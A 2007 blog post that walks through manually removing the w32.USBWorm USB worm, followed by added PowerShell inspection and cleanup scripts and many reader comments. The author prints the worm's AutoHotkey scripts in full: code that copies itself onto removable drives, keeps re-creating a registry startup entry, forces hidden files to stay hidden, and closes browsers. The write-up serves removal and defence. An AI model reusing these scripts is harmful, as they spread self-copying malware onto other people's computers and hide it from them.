May 16, 2007
w32.USBWorm: let's remove this worm manually
Yesterday my friend Vinay gave me a USB disk and asked me to copy some movies and music onto it. I took it home, plugged the USB disk into my system and scanned it with NOD32. It detected some viruses, which it removed successfully; little did I know that another worm had gone undetected and was about to infect my system. I double-clicked the USB drive and nothing happened. Strange. I right-clicked, opened the USB drive and found it had no content. (AutoPlay behaviour on a drive is driven by an Autorun.inf file in the root of the drive, and that is where this worm hooks in, as it turned out.) I didn't think much of it and closed the window, meaning to copy the data onto the drive later.
I wanted to check my mail, so I ran my beloved browser, Firefox. It opened, and within a couple of seconds a message box popped up saying "I DNT HATE MOZILLA BUT USE IE OR ELSE…" under the title "USE INTERNET EXPLORER YOU DOPE." I was like, what? It also terminated Firefox.
That is when I remembered the AutoPlay behaviour on the USB drive, and when I had to open Internet Explorer and Google this text. The worm's name turned out to be w32.USBWorm (by now it was obvious). The next step was to search for a removal tool, and to my amazement there was none, nor could I find any information on how to remove it. I decided to have a go at removing this worm myself. I tried opening Orkut and, bang, another surprise. This is the message it popped up: "ORKUT IS BANNED, Orkut is banned you fool, The administrators didnt write this program guess who did??" Now this was getting annoying, and I had no option but to remove the worm from my system. I pressed Ctrl+Alt+Del and found nothing suspicious in Task Manager. As it turned out later, the worm's process is named svchost.exe, so it hides among the legitimate service host processes, and Task Manager on XP doesn't show the path a process was started from.
Let's see what this worm does
The autorun.inf on the USB disk runs an executable named MicrosoftPowerpoint.exe, located on the disk, when the drive is double-clicked. Once that program has run you are infected: it drops the worm into a hidden folder on C:, forces hidden files and folders to stay hidden, keeps a process resident in memory, registers itself to start with Windows and pops up those annoying messages. This worm doesn't destroy any system files; it just copies itself onto other USB drives and spreads to new hosts.
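Before plugging a suspect stick into anything else it helps to read what its autorun.inf would launch, without letting it run. The PowerShell below is an added example written for this post, not code from the post or from the worm. It assumes Windows PowerShell 3.0 or later and builds a constructed stick under %TEMP%; the post never shows the real autorun.inf, so the open=, shellexecute= and shell\open\command= lines pointing at MicrosoftPowerpoint.exe are an assumption about how such a file is written. Get-AutorunTarget parses the [autorun] section for the keys Windows honours when a drive is opened or autoplayed, and Get-HiddenRootItem lists root entries carrying the Hidden or System attribute, which is how a dropper stays out of sight once Explorer is told not to show hidden files.

```powershell
# Added example (not from the post or the worm): inspect a drive's autorun.inf and
# its hidden root files without executing anything. Assumes Windows PowerShell 3.0+.

function Get-AutorunTarget {
    # Return the commands that the [autorun] section of <Root>\autorun.inf would launch.
    param([Parameter(Mandatory = $true)][string]$Root)

    $inf = Join-Path $Root 'autorun.inf'
    if (-not (Test-Path -LiteralPath $inf)) { return @() }

    $section = ''
    $targets = @()
    foreach ($line in (Get-Content -LiteralPath $inf -Force)) {
        $text = $line.Trim()
        if ($text -eq '' -or $text.StartsWith(';')) { continue }          # blank line or comment
        if ($text -match '^\[(.+)\]$') { $section = $Matches[1]; continue } # [section] header
        if ($section -ne 'autorun') { continue }                            # -ne is case-insensitive
        if ($text -match '^([^=]+)=(.*)$') {
            $key = $Matches[1].Trim()
            $val = $Matches[2].Trim()
            # open= and shellexecute= fire on AutoPlay/double-click;
            # shell\<verb>\command= replaces a context-menu verb such as Open or Explore
            if ($key -eq 'open' -or $key -eq 'shellexecute' -or $key -like 'shell\*\command') {
                $targets += New-Object PSObject -Property @{ Key = $key; Command = $val }
            }
        }
    }
    return $targets
}

function Get-HiddenRootItem {
    # List entries in the drive root that carry the Hidden or System attribute.
    param([Parameter(Mandatory = $true)][string]$Root)
    Get-ChildItem -LiteralPath $Root -Force |
        Where-Object { ($_.Attributes -band [IO.FileAttributes]::Hidden) -or ($_.Attributes -band [IO.FileAttributes]::System) } |
        Select-Object Name, Attributes, Length
}

# --- Constructed demo stick under %TEMP% (the real stick's autorun.inf is not shown in the post) ---
$demo = Join-Path $env:TEMP 'usbworm-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
@"
[autorun]
open=MicrosoftPowerpoint.exe
shellexecute=MicrosoftPowerpoint.exe
shell\open\command=MicrosoftPowerpoint.exe
icon=Icon.ico
"@ | Set-Content -LiteralPath (Join-Path $demo 'autorun.inf')
New-Item -ItemType File -Path (Join-Path $demo 'MicrosoftPowerpoint.exe') -Force | Out-Null
# mark both files Hidden+System, as a dropper would, so that Explorer hides them by default
foreach ($n in @('autorun.inf', 'MicrosoftPowerpoint.exe')) {
    (Get-Item -LiteralPath (Join-Path $demo $n) -Force).Attributes = 'Hidden, System'
}

Get-AutorunTarget -Root $demo | Format-Table Key, Command -AutoSize
Get-HiddenRootItem -Root $demo | Format-Table -AutoSize

Remove-Item -LiteralPath $demo -Recurse -Force
```

Point Get-AutorunTarget at a real stick (for example -Root 'E:\') and any open=, shellexecute= or shell\...\command= line that names an executable on the stick is the thing to delete or quarantine before the drive is double-clicked. Windows XP honoured these keys for USB disks by default; Windows 7 and the update KB971029 for earlier versions stopped AutoRun for non-optical media, which is why this class of worm died out.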
It's time to KO the worm
I have PE Tools installed on my PC, so I ran it to look at the running processes. Going through the list I found that an svchost.exe was responsible, and where PE Tools helped was that it showed this svchost.exe running from C:\heap41a. The genuine Windows service host only ever lives in C:\Windows\System32, so an svchost.exe running from anywhere else is suspect; that is also why it looked innocent in Task Manager, which doesn't show the path. So this is where the worm resides, and deleting the folder should do the job. It was not so easy, though: whenever I terminated svchost.exe from the process list it started again. So I booted XP into Safe Mode. In Safe Mode Windows loads only the minimum required drivers and skips the startup entries, so the worm's process is not launched along with Windows.
Now I looked for the folder C:\heap41a, but it was hidden. I went to Tools > Folder Options, selected "Show hidden files and folders" and pressed OK. I refreshed C:\ only to find that it still wouldn't show any hidden folders. Back in Tools > Folder Options, the setting had been reset. To see the contents anyway I used Windows Search, ticked "Search hidden files and folders" under the advanced options and searched for svchost.exe. Bang, it found it, and opening the folder showed that the file was not alone. The other items in the folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt and std.txt. Let's see the content of these files.
[offspring] – Appears as a blank folder (with hidden files suppressed, as they were at this point). reproduce.txt below copies this folder onto every removable drive, so this is where the autorun.inf and MicrosoftPowerpoint.exe that end up on USB sticks come from.
2.mp3 – A laughing sound
Icon.ico – A blank Icon file
reproduce.txt
#notrayicon
#persistent
; read the list of drive letters to target from driveList.txt
ArrayCount = 0
Loop, Read, C:\heap41a\driveList.txt
{
    ArrayCount += 1
    Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
; run the reproduce subroutine every 5 seconds
settimer,reproduce,5000
return

reproduce:
Loop %ArrayCount%
{
    element := Array%A_Index%
    driveget,data,Type,%element%:\
    ifequal,data,Removable
    {
        driveget,data1,status,%element%:\
        ifequal,data1,Ready
        {
            ; copy the offspring folder onto every ready removable drive, overwriting
            FileCopydir,C:\heap41a\offspring,%element%:\,1
        }
    }
}
; re-create the startup entry whenever it has been removed
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
    Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return
svchost.exe
This is the culprit binary, but it is not the real Windows service host (which lives in C:\Windows\System32). The .txt files are AutoHotkey scripts, and this svchost.exe is the AutoHotkey interpreter renamed to blend in; std.txt launches it with a script as its argument, and the scripts it runs are what produce all the annoying pop-ups.
script1.txt
#persistent
#notrayicon
; run the ban subroutine every 2 seconds
settimer,ban,2000
return

ban:
; first check the title of the active window
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
ifinstring,ed,youtube
{
    winclose %ed%
    soundplay,C:\heap41a\2.mp3
    msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
    return
}
ifinstring,ed,Mozilla Firefox
{
    winclose %ed%
    msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
    return
}
; for Internet Explorer the title alone is not enough, so the text of the first
; four Edit controls (the address bar among them) is checked for the site names
ifwinactive ahk_class IEFrame
{
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,orkut
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit1,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit2,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit3,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
    ControlGetText,ed,edit4,ahk_class IEFrame
    ifinstring,ed,youtube
    {
        winclose ahk_class IEFrame
        soundplay,C:\heap41a\2.mp3
        msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
        return
    }
}
return
std.txt
#notrayicon
#singleinstance,ignore
; force "Show hidden files and folders" off: CheckedValue is normally 1; setting it to 2
; (the same as DefaultValue) makes the Folder Options switch silently reset itself
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
    regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
; start the two worker scripts under the same renamed interpreter
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away everything this worm does; after reading the scripts I found that it also hates YouTube, lol. The most important information they gave was the registry keys it modifies.
These are the lines responsible for the hidden-folder problem I faced earlier. The worm sets CheckedValue under SHOWALL to 2, which is the same as the key's DefaultValue, so Explorer treats the "Show hidden files and folders" option as never having been turned on, and keeps doing so every time std.txt runs:
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
To rectify this, go to Start Menu > Run and type regedit. In the Registry Editor browse to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and set the CheckedValue DWORD back to 1 from 2. Now you can change the setting in Folder Options again. Next delete the folder C:\heap41a, and under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run delete the value (named winlogon on my system) whose data points at C:\heap41a\svchost.exe. Do this while the worm is not running (Safe Mode, or after killing the rogue svchost.exe), because reproduce.txt re-creates that value every five seconds while it is alive.
With that the infection is removed. Before you are done, make sure you also clean the USB drive so it doesn't infect other systems: format it, or at least turn on hidden files and delete autorun.inf and MicrosoftPowerpoint.exe from its root.
All the best. Until a tool is out for this worm, you can follow this method to remove w32.USBWorm.
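The manual steps above (reset CheckedValue, delete C:\heap41a, remove the Run-policy value, clean the USB stick) can be scripted so that nothing is missed and the order is right: the rogue process has to die first, because reproduce.txt re-creates the registry value every five seconds while it is alive. The script below is an added example written for this post, not the author's own method and not a vendor tool. It assumes an elevated Windows PowerShell 3.0 or later prompt, that the worm folder is C:\heap41a and the dropper is MicrosoftPowerpoint.exe as described above, and it supports -WhatIf so every change can be previewed before it is made.

```powershell
# Added example (not from the post): scripted clean-up of w32.USBWorm as the post
# describes it. Assumes an elevated Windows PowerShell 3.0+ prompt. Save it as a .ps1
# and run it with -WhatIf first to preview each step.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [string]$WormDir = 'C:\heap41a',              # worm folder named in the post
    [string]$Dropper = 'MicrosoftPowerpoint.exe'  # file the stick's autorun.inf launches
)

$showAll   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL'
$policyRun = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run'
$system32  = Join-Path $env:SystemRoot 'System32'

# 1. Stop every svchost.exe that is not running from System32. The genuine service host
#    only lives there; the worm borrows the name to blend into Task Manager. This must
#    happen first because reproduce.txt rewrites the Run-policy value every 5 seconds.
Get-Process -Name svchost -ErrorAction SilentlyContinue |
    Where-Object { $_.Path -and ($_.Path -notlike "$system32\*") } |
    ForEach-Object {
        if ($PSCmdlet.ShouldProcess($_.Path, 'Stop rogue svchost.exe')) {
            Stop-Process -Id $_.Id -Force
        }
    }

# 2. Put "Show hidden files and folders" back. std.txt sets CheckedValue to 2, which
#    equals DefaultValue and makes the Folder Options switch silently reset; 1 is normal.
$current = (Get-ItemProperty -Path $showAll -Name CheckedValue -ErrorAction SilentlyContinue).CheckedValue
if ($current -ne 1 -and $PSCmdlet.ShouldProcess($showAll, "Set CheckedValue from '$current' to 1")) {
    Set-ItemProperty -Path $showAll -Name CheckedValue -Value 1 -Type DWord
}

# 3. Remove every Explorer Run-policy value whose data points into the worm folder
#    (the post shows one named "winlogon" that runs svchost.exe with std.txt).
$meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'   # not registry values
if (Test-Path -Path $policyRun) {
    foreach ($prop in (Get-ItemProperty -Path $policyRun).PSObject.Properties) {
        if ($meta -contains $prop.Name) { continue }
        if (("$($prop.Value)" -like "*$WormDir*") -and
            $PSCmdlet.ShouldProcess("$policyRun -> $($prop.Name) = $($prop.Value)", 'Remove startup value')) {
            Remove-ItemProperty -Path $policyRun -Name $prop.Name
        }
    }
}

# 4. Delete the (hidden) worm folder and everything in it.
if ((Test-Path -LiteralPath $WormDir) -and $PSCmdlet.ShouldProcess($WormDir, 'Delete worm folder')) {
    Remove-Item -LiteralPath $WormDir -Recurse -Force
}

# 5. Clean the root of every removable drive instead of formatting it: autorun.inf and
#    the dropper are the two files the post names as landing on the stick.
Get-WmiObject -Class Win32_LogicalDisk -Filter 'DriveType=2' | ForEach-Object {
    $root = $_.DeviceID + '\'
    foreach ($name in @('autorun.inf', $Dropper)) {
        $file = Join-Path $root $name
        if ((Test-Path -LiteralPath $file) -and $PSCmdlet.ShouldProcess($file, 'Delete dropped file')) {
            Remove-Item -LiteralPath $file -Force
        }
    }
}

Write-Host 'Done. Reboot, then confirm Folder Options keeps "Show hidden files and folders" and that no svchost.exe runs outside System32.'
```

Run it once with -WhatIf to see the process, the registry value and the files it would touch, then again without. The step-1 check (any svchost.exe whose path is not under System32) is also a good standalone triage test to run on a machine showing these symptoms, with no cleanup at all.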
Written by: Allwin Samuel Jeba
Filed Under: Personal
Tags: Remove USB Virus, Virus
Trackback URL: http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/trackback/
Sweet Sri...
September 26, 2007 at 5:08 pm
Hi, thanks for the help. It's been a big problem with Orkut. Thanks a lot for your help.
Dagny
September 26, 2007 at 5:31 pm
Hey, I tried formatting my drive, but it seems like the worm isn't cleaned out yet, because some anti-virus software still detects MicrosoftPowerPoint.exe on my pen drive.
Rahul
September 27, 2007 at 8:04 am
Hi,
You can also type C:/heap41a in the address bar while running in Safe Mode, or delete svchost.exe from the DOS prompt.
Thanks.
audioguru
September 27, 2007 at 10:36 am
My AV never let this worm get far enough to disrupt any programs, but I had been trying to figure out how to get rid of that flash disk file for some time now. Thanks for the helpful post!
Sweet Sri...
September 27, 2007 at 6:14 pm
Hi all, thanks for all your feedback.
Friends, this really works. I am really happy that finally I am out of the Orkut blocker. Thanks to Allwin Samuel Jeba. It really helped me a lot.
aam_scorpio@rediff.com
October 2, 2007 at 1:58 am
Thanks a lot Alwin for this site.
I tried a lot to remove this w32.usbworm but it wouldn't come off, and finally I got to your site and was able to remove it.
A million thanks to "Susmita"; without her help I could not have accessed the registry on my computer to remove that file. Ha, I am relieved now.
Thanks to your site: http://filehippo.com/download_hijackthis/
kasyapa malladi
October 3, 2007 at 6:50 am
Thanks a lot, this was frying my brain for a long time.
Thanks for the solution.
chandrika
October 4, 2007 at 2:10 am
Hey,
God bless you, yaar.
You are a life saviour.
Thanks a lot.
But tell me one thing:
you posted this on 16th May,
and my laptop was affected last week, say around 25th September.
How come no tool is available for such a long time?
Didn't anyone discover this worm?
Phoenix
October 9, 2007 at 7:10 pm
All that is fine. You can remove the virus/worm from the system, but my question is, can you stop it from entering the system at all?
"Prevention is better than cure." What say?
MADDY
October 16, 2007 at 1:22 am
I found this an interesting solution, but when I went to change the value of 'Checked All' to 1, to my surprise there was no such parameter at all in that registry directory! I thought for a while and went on to restore my system to an earlier date.
AND IT WORKED!!! No worm now! Isn't this a simple solution for an amateur?!
anish
October 16, 2007 at 12:17 pm
Hello my dear Jeba,
I'm really happy using your tool, thank you.
Really, thanks to you.
abhith
October 21, 2007 at 4:32 am
Hey, that's one amazing piece of work you've shown all of us, bro. You da man. Take a bow. :)
pradeep kandpal
October 22, 2007 at 6:17 am
Hi, I am Pradeep. On my PC, when I open the command prompt or regedit, my computer restarts automatically. Please help me and email me the solution.
Akshay
October 22, 2007 at 7:24 am
Thanks a lot, really, it's fantastic.
Vinay
October 31, 2007 at 6:38 pm
Thanks a lot, dude.
By the way, after restarting my computer there was this box asking to create some txt file that I deleted earlier. I clicked on No because I didn't want all that mess again. Will it threaten my computer?
vinayak
November 7, 2007 at 11:41 am
How can I edit svchost.exe? This is an AutoHotkey program.
vinayak
November 7, 2007 at 11:45 am
In the %temp% folder you'll find a MicrosoftPowerPoint folder; delete that folder.
manan00
November 9, 2007 at 5:35 pm
Thanks a lot, dude.
I appreciate you doing this great job.
Dude, I want one more thing from you:
Trojan horses are one more thing I wanted to know inside out.
Please help me out with it.
Ayan
November 14, 2007 at 2:53 pm
Pretty good research you have done here, but guess what, I did it much earlier. I still wanted to check if I had missed anything. Thanks for the confirmation.
vikrantr
November 20, 2007 at 12:31 pm
Hey, thanks a lot for the help. It did solve a major problem I faced.
Keep up the good work.
dr0pped
December 9, 2007 at 10:54 pm
Hello guys!
I already deleted heap41a and svchost but my desktop is still not running properly. When Windows boots, this message appears: “Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0″.
[English translation of the Indonesian lines: "Thank you for keeping me company even if only for a moment; to me it meant a great deal. Forgive me if the happiness I asked for was a companion for the whole of my life. I should have understood that my place is not at your side, only a daydream in regret. For the beloved I will never have."]
And if I right-click my folders, "test", "configure" and "install" appear where it should be "open" or "explore". And there is still no "show hidden folders".
Help me please, guys!!
Thanks!
Sergio
December 24, 2007 at 4:22 pm
Thanks it helped a lot
Vidur
December 25, 2007 at 2:57 pm
Hello Allwin,
I have the same problem as Ganesh. The Registry Editor isn't showing a "checked all" value; instead it's showing "checked value" (0) and "default value" (2). Which one should I change? Please help.
Vidur
Ranjan Kuamar Ojha
December 28, 2007 at 3:52 pm
Hi,
I am Ranjan Kumar Ojha, final year student of IIIT Allahabad. Thanks for your blog about Mozilla. I think you're a genius. I also want to fight against viruses, but I don't know where to start. Would you like to guide me?
Thanks again.
Sandeep Baynes
January 7, 2008 at 1:40 am
Well, if you're not so familiar with the registry, and if your registry has been locked, you can download a tool called rrt.exe to remove restrictions. It enables the registry and lifts all other restrictions. Then, after you remove the restrictions, you can continue with the work. The Orkut virus also locks the registry sometimes.
Sandeep Baynes
January 7, 2008 at 1:43 am
Hey, and also don't forget to delete all entries with the name heap in the registry.
slimshady23x7
January 10, 2008 at 2:21 pm
Hey dude! I hope this works, but there's one problem: I can't run Task Manager. When I press Alt+Ctrl+Del the Task Manager appears for a second or two and then disappears. Please try and help me. Thank you.
freddyvj
January 25, 2008 at 11:44 am
Hey Jeba,
thank you,
but I still cannot view the hidden files and folders after doing all this. What can I do further?
Allwin Samuel Jeba
February 2, 2008 at 2:08 pm
Try to search for the folder in c:\windows\temp .
xGuiNHOX
February 24, 2008 at 6:53 am
You don't need to format your USB drive. Just open your archive manager (WinRAR, for example), open your USB drive, and you will see MicrosoftPowerPoint.exe, an SFX file, right there. Just delete it.
Good luck to all.
Kisses, BRAZIL
Sagar Rao
May 21, 2008 at 11:21 am
Hello guys!
When Windows boots, this message appears: “Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0”.
[English translation of the Indonesian lines: "Thank you for keeping me company even if only for a moment; to me it meant a great deal. Forgive me if the happiness I asked for was a companion for the whole of my life. I should have understood that my place is not at your side, only a daydream in regret. For the beloved I will never have."]
And it's not showing any folders on my C: or D: drive. If I right-click my folders, "test", "configure" and "install" appear where it should be "open" or "explore". And there is still no "show hidden folders". Now I can log in to Windows but it won't let me go inside; it repeatedly pops up the virus message, i.e. “Surabaya in my birthday”, and asks me to log in again.
Help me please, guys!!
Thanks!
alpachino18
June 13, 2008 at 9:12 am
Well, can anyone help me out? Even I'm facing the same problem, but my first problem is that I'm not able to open the Task Manager at all. It appears for a second and then disappears again, so I can't even start, i.e. without opening the Task Manager I'm not able to delete the svchost.exe file. Please, guys, help me out. Please.
abhijeet
June 15, 2008 at 1:30 pm
I have not found any folder heap41a or heap* on my C:, so I can't proceed further. Is that folder created anywhere else with a different name? I am able to search hidden folders, but not the one specified by you. Please help us with this issue.
Thanks,
abhijeet
priyanka
June 29, 2008 at 2:02 pm
Thank you so much Jeba, I was really frustrated with that worm. I am so very grateful to you.
Bless you.
Alpesh
July 3, 2008 at 12:01 pm
Orkut is banned, dont try to open it, since it is restricted!!!
Posted on May 5, 2008 12:45:47 PM | Filed under: Uncategorized
Yesterday one of my friends called me up and told me that he could not open any of the files on his pen drive and was getting a message related to 'system.exe'.
At first I thought there could be some bad sectors on his drive, so I told him to bring it to my home so that I could check it out.
When I inserted the drive into my laptop, the message popped up on my system as well. I can't recall the message, but I can tell you that it was for the file 'system.exe' and below it there were two buttons, 'yes' and 'no'. Accidentally I clicked the yes button and then my system restarted.
On the restart I found that my antivirus was disabled. Then I tried to open the Task Manager, but it too appeared for only 2-3 seconds. Then I realised that my system was affected by a virus, and my first guess was W32.USBWorm.
OK, I won't go into the details now and will tell you the virus symptoms and how to remove it.
Symptoms:
1) The Task Manager shows up for 2-3 seconds and then the message “—SORRY— –SAM–” comes up.
2) When you try to access Orkut, the message “Orkut is banned, don't try to open it since it is restricted!!!” is displayed.
3) You cannot search for anything related to the virus, as the message “Obscene sites banned” or something like that is displayed.
4) You cannot unzip or extract any zipped files.
5) Most importantly, it also disables any antivirus.
6) You won't be able to open 80% of your software; there will be some error or other.
Actually I could find only these symptoms; there could be more.
Removal Instructions:
1) Restart the computer in Safe Mode by pressing the F8 key during the restart and then selecting Safe Mode from the list.
2) Open the drive on which Windows is installed; in most cases it is “C:”.
3) Go to Tools > Folder Options > View, find the radio button “Show hidden files and folders” and check it. Just below it there is a check box “Hide protected operating system files”; uncheck it.
4) Now in the ‘C:’ drive you will see a folder named “Config”; simply delete that folder.
5) Now open the Registry Editor by typing ‘regedit’ in the Run dialog box.
6) Go to the following key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] and delete the key whose path is something like “C:\config\system.exe”.
And another edit: do the above action with the below-mentioned key as well:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies]
7) Restart the computer and you are done.
Onesimus
July 4, 2008 at 7:59 am
Hi Jeba,
Thanks for the info you have given. I am going to try this now. Thanks a lot anyway. God bless you abundantly. Take care.
Greetings mate. Nice blog. I have seen many people face this problem with this worm, with all those annoying messages.
ADS
July 7, 2008 at 5:22 pm
Can you please share some info on the below-mentioned virus? My Kaspersky says deleted. Will I have to do anything more?
Virus.Win32.Hidrag.a
arushi
July 9, 2008 at 11:42 am
Thanks a ton for such a detailed explanation. I was searching for one like this.
bhise
July 20, 2008 at 5:11 pm
Can anyone help in removing this virus?
Surabaya in my birthday
Don’t kill me, i’m just send message from your computer
Terima kasih telah menemaniku walaupun hanya sesaat, tapi bagiku sangat berarti
Maafkan jika kebahagiaan yang kuminta adalah teman sepanjang hidupku
Seharusnya aku mengerti bahwa keberadaanku bukanlah disisimu, hanyalah lamunan dalam sesal
Untuk kekasih yang tak kan pernah kumiliki 3r1k1m0
[English translation of the Indonesian lines: "Thank you for keeping me company even if only for a moment; to me it meant a great deal. Forgive me if the happiness I asked for was a companion for the whole of my life. I should have understood that my place is not at your side, only a daydream in regret. For the beloved I will never have."]
eldhose
July 28, 2008 at 4:27 am
Thank you, man.
Pranesh
July 31, 2008 at 5:58 am
Thanks a lot.
You'll be remembered by many for your help!!!
Ashoka BL
December 14, 2008 at 5:45 am
Hi guys,
It's really an awesome worm; it took me almost 2 hours to figure out. Somehow, using advanced search, I got the location of microsoftpowerpoint.exe and deleted the folder, but I was still getting the same error. I was able to see all the hidden folders but not heap41a; I was going mad, and then I thought let me try the command prompt, and bang, I found the folder in C:\. I deleted all the files and then the folder, and here I am, happily back on Orkut.
One suggestion: when you guys use a thumb drive, don't have an autorun option.
Thanks pals, and thanks Jeba, you rock.
Regards,
Ashoka BL
Bangalore